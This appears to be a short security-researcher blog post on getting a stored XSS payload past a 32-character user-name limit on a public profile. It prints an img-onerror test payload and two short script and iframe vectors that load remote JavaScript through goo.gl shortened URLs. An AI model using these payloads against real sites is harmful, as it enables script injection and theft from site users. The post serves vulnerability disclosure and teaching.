A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:
[code lang=”html”]d<img src=x onerror=prompt(1)>[/code]
Simple right?
But sometimes you need to provide a better vector where the affected company can see more than a prompt with a number. Also they know the limitation of their textfield to 32 chars.
I found two methods using SCRIPT and IFRAME.
When I was tring using this with a tiny URL [is.gd] pointing to my XSS code at davidsopas.com I realized that the vector wasn’t executing.
Why? It required HTTPS.
I searched for a tiny url that provided HTTPS and Google provide me with one – goo.gl.
So my final vector was:
[code lang=”html”]<script src=//goo.gl/TJnzmV>
<iframe src=//goo.gl/xWYG4f>[/code]
29 chars and you I could use any Javascript I wanted.
It was fun!
You guys have any other method you like to share?